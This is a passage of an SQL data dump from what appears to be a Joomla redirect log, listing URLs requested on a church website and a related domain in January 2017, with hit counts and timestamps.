(2181, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1867/7/-', NULL, '', '', 1, 0, '2017-01-18 07:52:35', '0000-00-00 00:00:00', 301),
(2182, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/4/-', NULL, '', '', 1, 0, '2017-01-18 07:52:43', '0000-00-00 00:00:00', 301),
(2183, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/3/-', NULL, '', '', 1, 0, '2017-01-18 07:52:48', '0000-00-00 00:00:00', 301),
(2184, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=media&Itemid=626', NULL, '', '', 1, 0, '2017-01-18 09:33:08', '0000-00-00 00:00:00', 301),
(2185, 'http://lifeoasisinternationalchurch.org/resources/', NULL, 'http://lifeoasisinternationalchurch.org/resources/', '', 24, 0, '2017-01-18 10:14:02', '0000-00-00 00:00:00', 301),
(2186, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=33:media-outreach&catid=18:loic&Itemid=200', NULL, '', '', 3, 0, '2017-01-18 11:03:53', '0000-00-00 00:00:00', 301),
(2187, 'http://lifeoasisinternationalchurch.org/resources/french', NULL, '', '', 5, 0, '2017-01-18 11:06:13', '0000-00-00 00:00:00', 301),
(2188, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup?tmpl=component', NULL, '', '', 6, 0, '2017-01-18 11:18:33', '0000-00-00 00:00:00', 301),
(2189, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=36&Itemid=202', NULL, '', '', 1, 0, '2017-01-18 11:29:01', '0000-00-00 00:00:00', 301),
(2190, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/sermons', NULL, '', '', 3, 0, '2017-01-18 11:29:48', '0000-00-00 00:00:00', 301),
(2191, 'https://www.spiritmeat.nethttps//www.spiritmeat.net', NULL, '', '', 38, 0, '2017-01-18 11:50:36', '0000-00-00 00:00:00', 301),
(2192, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=media&Itemid=775', NULL, '', '', 1, 0, '2017-01-18 12:04:45', '0000-00-00 00:00:00', 301),
(2193, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2/sermons', NULL, '', '', 6, 0, '2017-01-18 12:35:00', '0000-00-00 00:00:00', 301),
(2194, 'http://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/54-slide-04', NULL, '', '', 2, 0, '2017-01-18 12:53:31', '0000-00-00 00:00:00', 301),
(2195, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 12, 0, '2017-01-18 14:11:01', '0000-00-00 00:00:00', 301),
(2196, 'http://ljmti.lifeoasisinternationalchurch.org/digital/vod', NULL, '', '', 1, 0, '2017-01-18 14:15:05', '0000-00-00 00:00:00', 301),
(2197, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=52:daddy&catid=18:loic&Itemid=294', NULL, '', '', 2, 0, '2017-01-18 14:17:45', '0000-00-00 00:00:00', 301),
(2198, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermons/0/0?start=20', NULL, '', '', 1, 0, '2017-01-18 14:30:49', '0000-00-00 00:00:00', 301),
(2199, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/12/15', NULL, '', '', 3, 0, '2017-01-18 14:30:52', '0000-00-00 00:00:00', 301),
(2200, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=WordPress&Itemid=775', NULL, '', '', 1, 0, '2017-01-18 14:36:16', '0000-00-00 00:00:00', 301),
(2201, 'http://lifeoasisinternationalchurch.org/gallery', NULL, '', '', 64, 0, '2017-01-18 15:42:11', '0000-00-00 00:00:00', 301),
(2202, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio/2-column', NULL, '', '', 1, 0, '2017-01-18 19:18:25', '0000-00-00 00:00:00', 301),
(2203, 'http://lifeoasisinternationalchurch.org/live.php', NULL, '', '', 2, 0, '2017-01-18 19:28:46', '0000-00-00 00:00:00', 301),
(2204, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2', NULL, '', '', 43, 0, '2017-01-18 20:28:15', '0000-00-00 00:00:00', 301),
(2205, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/18/-', NULL, '', '', 1, 0, '2017-01-18 20:58:04', '0000-00-00 00:00:00', 301),
(2206, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1866/7/-', NULL, '', '', 1, 0, '2017-01-18 20:58:12', '0000-00-00 00:00:00', 301),
(2207, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1862/3/-', NULL, '', '', 1, 0, '2017-01-18 20:58:19', '0000-00-00 00:00:00', 301),
(2208, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/4/-', NULL, '', '', 1, 0, '2017-01-18 20:58:27', '0000-00-00 00:00:00', 301),
(2209, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/31/-', NULL, '', '', 1, 0, '2017-01-18 20:58:35', '0000-00-00 00:00:00', 301),
(2210, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/28/-', NULL, '', '', 1, 0, '2017-01-18 20:58:42', '0000-00-00 00:00:00', 301),
(2211, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/23/-', NULL, '', '', 1, 0, '2017-01-18 20:58:50', '0000-00-00 00:00:00', 301),
(2212, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1868/7/-', NULL, '', '', 1, 0, '2017-01-18 20:59:05', '0000-00-00 00:00:00', 301),
(2213, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/5/-', NULL, '', '', 1, 0, '2017-01-18 20:59:12', '0000-00-00 00:00:00', 301),
(2214, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1862/4/-', NULL, '', '', 1, 0, '2017-01-18 20:59:20', '0000-00-00 00:00:00', 301),
(2215, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1861/3/-', NULL, '', '', 1, 0, '2017-01-18 20:59:28', '0000-00-00 00:00:00', 301),
(2216, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/7/-', NULL, '', '', 1, 0, '2017-01-18 20:59:35', '0000-00-00 00:00:00', 301),
(2217, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1861/4/-', NULL, '', '', 1, 0, '2017-01-18 20:59:43', '0000-00-00 00:00:00', 301),
(2218, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/6/-', NULL, '', '', 1, 0, '2017-01-18 20:59:50', '0000-00-00 00:00:00', 301),
(2219, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/27/-', NULL, '', '', 1, 0, '2017-01-18 20:59:58', '0000-00-00 00:00:00', 301),
(2220, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/6/-', NULL, '', '', 1, 0, '2017-01-18 21:00:05', '0000-00-00 00:00:00', 301),
(2221, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/22/-', NULL, '', '', 1, 0, '2017-01-18 21:00:13', '0000-00-00 00:00:00', 301),
(2222, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/11/-', NULL, '', '', 1, 0, '2017-01-18 21:00:20', '0000-00-00 00:00:00', 301),
(2223, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/26/-', NULL, '', '', 1, 0, '2017-01-18 21:00:28', '0000-00-00 00:00:00', 301),
(2224, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/7/-', NULL, '', '', 1, 0, '2017-01-18 21:00:35', '0000-00-00 00:00:00', 301),
(2225, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/26/-', NULL, '', '', 1, 0, '2017-01-18 21:00:43', '0000-00-00 00:00:00', 301),
(2226, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/19/-', NULL, '', '', 1, 0, '2017-01-18 21:00:50', '0000-00-00 00:00:00', 301),
(2227, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/24/-', NULL, '', '', 1, 0, '2017-01-18 21:00:58', '0000-00-00 00:00:00', 301),
(2228, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1866/9/-', NULL, '', '', 1, 0, '2017-01-18 21:01:05', '0000-00-00 00:00:00', 301),
(2229, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1865/6/-', NULL, '', '', 1, 0, '2017-01-18 21:01:13', '0000-00-00 00:00:00', 301),
(2230, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/3/-', NULL, '', '', 1, 0, '2017-01-18 21:01:20', '0000-00-00 00:00:00', 301),
(2231, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1865/8/-', NULL, '', '', 1, 0, '2017-01-18 21:01:28', '0000-00-00 00:00:00', 301),
(2232, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/12/-', NULL, '', '', 1, 0, '2017-01-18 21:01:35', '0000-00-00 00:00:00', 301),
(2233, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/20/-', NULL, '', '', 1, 0, '2017-01-18 21:01:43', '0000-00-00 00:00:00', 301),
(2234, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/21/-', NULL, '', '', 1, 0, '2017-01-18 21:01:51', '0000-00-00 00:00:00', 301),
(2235, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/28/-', NULL, '', '', 1, 0, '2017-01-18 21:01:58', '0000-00-00 00:00:00', 301),
(2236, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/7/-', NULL, '', '', 1, 0, '2017-01-18 21:02:06', '0000-00-00 00:00:00', 301),
(2237, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1865/9/-', NULL, '', '', 1, 0, '2017-01-18 21:02:13', '0000-00-00 00:00:00', 301),
(2238, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/6/-', NULL, '', '', 1, 0, '2017-01-18 21:02:21', '0000-00-00 00:00:00', 301),
(2239, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/24/-', NULL, '', '', 1, 0, '2017-01-18 21:02:29', '0000-00-00 00:00:00', 301),
(2240, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1865/5/-', NULL, '', '', 1, 0, '2017-01-18 21:02:36', '0000-00-00 00:00:00', 301),
(2241, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1861/5/-', NULL, '', '', 1, 0, '2017-01-18 21:02:44', '0000-00-00 00:00:00', 301),
(2242, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/29/-', NULL, '', '', 1, 0, '2017-01-18 21:05:25', '0000-00-00 00:00:00', 301),
(2243, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/9/-', NULL, '', '', 1, 0, '2017-01-18 21:09:11', '0000-00-00 00:00:00', 301),
(2244, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/4/-', NULL, '', '', 1, 0, '2017-01-18 21:12:59', '0000-00-00 00:00:00', 301),
(2245, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/28/-', NULL, '', '', 1, 0, '2017-01-18 21:16:46', '0000-00-00 00:00:00', 301),
(2246, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/12/-', NULL, '', '', 1, 0, '2017-01-18 21:20:36', '0000-00-00 00:00:00', 301),
(2247, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2', NULL, '', '', 6, 0, '2017-01-18 21:21:53', '0000-00-00 00:00:00', 301),
(2248, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 3, 0, '2017-01-18 22:02:40', '0000-00-00 00:00:00', 301),
(2249, 'http://lifeoasisinternationalchurch.org/index.php/administrator/', NULL, 'http://lifeoasisinternationalchurch.org/index.php/administrator/', '', 6, 0, '2017-01-18 22:12:11', '0000-00-00 00:00:00', 301),
(2250, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2', NULL, '', '', 21, 0, '2017-01-18 22:17:08', '0000-00-00 00:00:00', 301),
(2251, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2/sermons', NULL, '', '', 4, 0, '2017-01-18 22:44:59', '0000-00-00 00:00:00', 301),
(2252, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 4, 0, '2017-01-19 00:31:24', '0000-00-00 00:00:00', 301),
(2253, 'http://lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 2, 0, '2017-01-19 00:55:23', '0000-00-00 00:00:00', 301),
(2254, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=62&Itemid=358', NULL, '', '', 1, 0, '2017-01-19 01:03:55', '0000-00-00 00:00:00', 301),
(2255, 'https://spiritmeat.net/status.php', NULL, '', '', 1, 0, '2017-01-19 01:24:14', '0000-00-00 00:00:00', 301),
(2256, 'https://spiritmeat.net/nextcloud/status.php', NULL, '', '', 1, 0, '2017-01-19 01:24:14', '0000-00-00 00:00:00', 301),
(2257, 'https://spiritmeat.net/owncloud/status.php', NULL, '', '', 1, 0, '2017-01-19 01:24:15', '0000-00-00 00:00:00', 301),
(2258, 'https://spiritmeat.net/oc/status.php', NULL, '', '', 1, 0, '2017-01-19 01:24:15', '0000-00-00 00:00:00', 301),
(2259, 'https://spiritmeat.net/oc-shib/status.php', NULL, '', '', 1, 0, '2017-01-19 01:24:15', '0000-00-00 00:00:00', 301),
(2260, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 4, 0, '2017-01-19 01:37:10', '0000-00-00 00:00:00', 301),
(2261, 'http://ljmti.lifeoasisinternationalchurch.org/joomla/iframe-wrapper', NULL, '', '', 1, 0, '2017-01-19 01:42:25', '0000-00-00 00:00:00', 301),
(2262, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/20-prayer-a-fasting-day-11', NULL, '', '', 6, 0, '2017-01-19 02:30:12', '0000-00-00 00:00:00', 301),
(2263, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1863/8/-', NULL, '', '', 1, 0, '2017-01-19 03:42:58', '0000-00-00 00:00:00', 301),
(2264, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1859/2/-', NULL, '', '', 1, 0, '2017-01-19 03:43:24', '0000-00-00 00:00:00', 301),
(2265, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1861/6/-', NULL, '', '', 1, 0, '2017-01-19 03:43:39', '0000-00-00 00:00:00', 301),
(2266, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1859/4/-', NULL, '', '', 1, 0, '2017-01-19 03:43:54', '0000-00-00 00:00:00', 301),
(2267, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1862/7/-', NULL, '', '', 1, 0, '2017-01-19 03:44:24', '0000-00-00 00:00:00', 301),
(2268, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/10/-', NULL, '', '', 1, 0, '2017-01-19 03:44:40', '0000-00-00 00:00:00', 301),
(2269, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/5/-', NULL, '', '', 1, 0, '2017-01-19 03:44:55', '0000-00-00 00:00:00', 301),
(2270, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1864/5/-', NULL, '', '', 1, 0, '2017-01-19 03:45:10', '0000-00-00 00:00:00', 301),
(2271, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/1/-', NULL, '', '', 1, 0, '2017-01-19 03:45:25', '0000-00-00 00:00:00', 301),
(2272, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/26/-', NULL, '', '', 1, 0, '2017-01-19 03:45:40', '0000-00-00 00:00:00', 301),
(2273, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/12/-', NULL, '', '', 1, 0, '2017-01-19 03:45:56', '0000-00-00 00:00:00', 301),
(2274, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/26/-', NULL, '', '', 1, 0, '2017-01-19 03:46:11', '0000-00-00 00:00:00', 301),
(2275, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/4/9/-', NULL, '', '', 1, 0, '2017-01-19 03:46:26', '0000-00-00 00:00:00', 301),
(2276, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/10/18/-', NULL, '', '', 1, 0, '2017-01-19 03:46:42', '0000-00-00 00:00:00', 301),
(2277, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/21/-', NULL, '', '', 1, 0, '2017-01-19 03:46:57', '0000-00-00 00:00:00', 301),
(2278, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/4/-', NULL, '', '', 1, 0, '2017-01-19 03:47:13', '0000-00-00 00:00:00', 301),
(2279, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/11/4/-', NULL, '', '', 1, 0, '2017-01-19 03:47:29', '0000-00-00 00:00:00', 301),
(2280, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/14/-', NULL, '', '', 1, 0, '2017-01-19 03:47:48', '0000-00-00 00:00:00', 301),
(2281, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/', NULL, '', '', 1, 0, '2017-01-19 04:37:27', '0000-00-00 00:00:00', 301),
(2282, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/3', NULL, '', '', 1, 0, '2017-01-19 05:58:29', '0000-00-00 00:00:00', 301),
(2283, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-news/itemlist/tag/Lighthouse', NULL, '', '', 1, 0, '2017-01-19 07:38:19', '0000-00-00 00:00:00', 301),
(2284, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/30', NULL, '', '', 2, 0, '2017-01-19 08:45:38', '0000-00-00 00:00:00', 301),
(2285, 'http://www.lifeoasisinternationalchurch.org/141-2014-12', NULL, '', '', 1, 0, '2017-01-19 12:41:31', '0000-00-00 00:00:00', 301),
(2286, 'http://lifeoasisinternationalchurch.org/gobc2009/index.html', NULL, '', '', 2, 0, '2017-01-19 14:40:03', '0000-00-00 00:00:00', 301),
(2287, 'http://www.lifeoasisinternationalchurch.org/index.php/207-2015-day-33', NULL, '', '', 7, 0, '2017-01-19 15:32:51', '0000-00-00 00:00:00', 301),
(2288, 'http://www.lifeoasisinternationalchurch.org/layouts/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/layouts/logo_img.php', '', 2, 0, '2017-01-19 16:32:58', '0000-00-00 00:00:00', 301),
(2289, 'http://www.lifeoasisinternationalchurch.org/language/logo_img.php', NULL, 'http://www.lifeoasisinternationalchurch.org/language/logo_img.php', '', 2, 0, '2017-01-19 16:34:39', '0000-00-00 00:00:00', 301),
(2290, 'http://www.lifeoasisinternationalchurch.org/media/breezingforms/themes/qmtheme/css-ec3d8f1364f747473fc0787fbf47d0fd.php', NULL, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/67-simmp', '', 10, 0, '2017-01-19 16:42:48', '0000-00-00 00:00:00', 301),
(2291, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=responsive&Itemid=775', NULL, '', '', 1, 0, '2017-01-19 17:06:22', '0000-00-00 00:00:00', 301),
(2292, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/49-prayer-a-fasting-day-38', NULL, '', '', 9, 0, '2017-01-19 18:52:02', '0000-00-00 00:00:00', 301),
(2293, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=AudioJungle', NULL, '', '', 1, 0, '2017-01-19 19:37:51', '0000-00-00 00:00:00', 301),
(2294, 'http://www.lifeoasisinternationalchurch.org/featured-messages/18-loic/50-young-achievers', NULL, '', '', 8, 0, '2017-01-19 20:13:52', '0000-00-00 00:00:00', 301),
(2295, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes&Itemid=775', NULL, '', '', 1, 0, '2017-01-19 20:53:36', '0000-00-00 00:00:00', 301),
(2296, 'http://lifeoasisinternationalchurch.org/index.php/262-day-2-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 1, 0, '2017-01-19 21:36:11', '0000-00-00 00:00:00', 301),
(2297, 'http://www.lifeoasisinternationalchurch.org/index.php/index.php?option=com_content&view=article&id=33:media-outreach&catid=18:loic&Itemid=200', NULL, '', '', 2, 0, '2017-01-19 22:07:45', '0000-00-00 00:00:00', 301),
(2298, 'http://lifeoasisinternationalchurch.org/forum', NULL, 'http://lifeoasisinternationalchurch.org/forum', '', 2, 0, '2017-01-19 22:30:43', '0000-00-00 00:00:00', 301),
(2299, 'http://ljmti.lifeoasisinternationalchurch.org/images/christ1.png', NULL, '', '', 1, 0, '2017-01-19 23:38:47', '0000-00-00 00:00:00', 301),
(2300, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/21/-', NULL, '', '', 1, 0, '2017-01-20 00:42:57', '0000-00-00 00:00:00', 301),
(2301, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1869/10/-', NULL, '', '', 1, 0, '2017-01-20 00:43:09', '0000-00-00 00:00:00', 301),
(2302, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1859/3/-', NULL, '', '', 1, 0, '2017-01-20 00:43:22', '0000-00-00 00:00:00', 301),
(2303, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1859/5/-', NULL, '', '', 1, 0, '2017-01-20 00:43:36', '0000-00-00 00:00:00', 301),
(2304, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1861/7/-', NULL, '', '', 1, 0, '2017-01-20 00:43:50', '0000-00-00 00:00:00', 301),
(2305, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/27/-', NULL, '', '', 1, 0, '2017-01-20 00:44:14', '0000-00-00 00:00:00', 301),
(2306, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1862/8/-', NULL, '', '', 1, 0, '2017-01-20 00:44:39', '0000-00-00 00:00:00', 301),
(2307, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/2/-', NULL, '', '', 1, 0, '2017-01-20 00:44:52', '0000-00-00 00:00:00', 301),
(2308, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/9/6/-', NULL, '', '', 1, 0, '2017-01-20 00:45:04', '0000-00-00 00:00:00', 301),
(2309, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/7/29/-', NULL, '', '', 1, 0, '2017-01-20 00:45:17', '0000-00-00 00:00:00', 301),
(2310, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/30/-', NULL, '', '', 1, 0, '2017-01-20 00:45:29', '0000-00-00 00:00:00', 301),
(2311, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/11/-', NULL, '', '', 1, 0, '2017-01-20 00:45:41', '0000-00-00 00:00:00', 301),
(2312, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1857/2/-', NULL, '', '', 1, 0, '2017-01-20 00:45:54', '0000-00-00 00:00:00', 301),
(2313, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1857/4/-', NULL, '', '', 1, 0, '2017-01-20 00:46:06', '0000-00-00 00:00:00', 301),
(2314, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/5/-', NULL, '', '', 1, 0, '2017-01-20 00:46:19', '0000-00-00 00:00:00', 301),
(2315, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/12/21/-', NULL, '', '', 1, 0, '2017-01-20 00:46:31', '0000-00-00 00:00:00', 301),
(2316, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1858/1/-', NULL, '', '', 1, 0, '2017-01-20 00:46:44', '0000-00-00 00:00:00', 301),
(2317, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/9/2/-', NULL, '', '', 1, 0, '2017-01-20 00:46:56', '0000-00-00 00:00:00', 301),
(2318, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/6/1/-', NULL, '', '', 1, 0, '2017-01-20 00:47:09', '0000-00-00 00:00:00', 301),
(2319, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/22/-', NULL, '', '', 1, 0, '2017-01-20 00:47:22', '0000-00-00 00:00:00', 301),
(2320, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/10/-', NULL, '', '', 1, 0, '2017-01-20 00:47:35', '0000-00-00 00:00:00', 301),
(2321, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/8/20/-', NULL, '', '', 1, 0, '2017-01-20 00:47:50', '0000-00-00 00:00:00', 301),
(2322, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti/12-resources', NULL, '', '', 2, 0, '2017-01-20 01:11:32', '0000-00-00 00:00:00', 301),
(2323, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun', NULL, '', '', 40, 0, '2017-01-20 01:38:54', '0000-00-00 00:00:00', 301),
(2324, 'http://www.lifeoasisinternationalchurch.org/loic-forum/2-uncategorised/41-programmes2', NULL, '', '', 1, 0, '2017-01-20 02:36:32', '0000-00-00 00:00:00', 301),
(2325, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/4', NULL, '', '', 3, 0, '2017-01-20 03:03:41', '0000-00-00 00:00:00', 301),
(2326, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/our-service-schedule', NULL, '', '', 30, 0, '2017-01-20 04:39:31', '0000-00-00 00:00:00', 301),
(2327, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media/item/7-audiojungle-comes-to-life', NULL, '', '', 1, 0, '2017-01-20 05:18:31', '0000-00-00 00:00:00', 301),
(2328, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/19', NULL, '', '', 6, 0, '2017-01-20 06:11:53', '0000-00-00 00:00:00', 301),
(2329, 'http://www.lifeoasisinternationalchurch.org/home/ministry', NULL, '', '', 3, 0, '2017-01-20 07:04:38', '0000-00-00 00:00:00', 301),
(2330, 'http://www.lifeoasisinternationalchurch.org/index.php/60-prophetic-words-for-day-1', NULL, '', '', 8, 0, '2017-01-20 07:28:51', '0000-00-00 00:00:00', 301),
(2331, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/42862', NULL, '', '', 1, 0, '2017-01-20 07:37:01', '0000-00-00 00:00:00', 301),
(2332, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/17-prayer-a-fasting-day-8', NULL, '', '', 6, 0, '2017-01-20 08:24:05', '0000-00-00 00:00:00', 301),
(2333, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/9/22/-', NULL, '', '', 1, 0, '2017-01-20 10:48:00', '0000-00-00 00:00:00', 301),
(2334, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1860/7/-', NULL, '', '', 1, 0, '2017-01-20 10:48:35', '0000-00-00 00:00:00', 301),
(2335, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/1/11/-', NULL, '', '', 1, 0, '2017-01-20 10:49:15', '0000-00-00 00:00:00', 301),
(2336, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1862/9/-', NULL, '', '', 1, 0, '2017-01-20 10:49:54', '0000-00-00 00:00:00', 301),
(2337, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/8/3/-', NULL, '', '', 1, 0, '2017-01-20 10:50:41', '0000-00-00 00:00:00', 301),
(2338, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1859/6/-', NULL, '', '', 1, 0, '2017-01-20 10:51:06', '0000-00-00 00:00:00', 301),
(2339, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1861/8/-', NULL, '', '', 1, 0, '2017-01-20 10:51:38', '0000-00-00 00:00:00', 301),
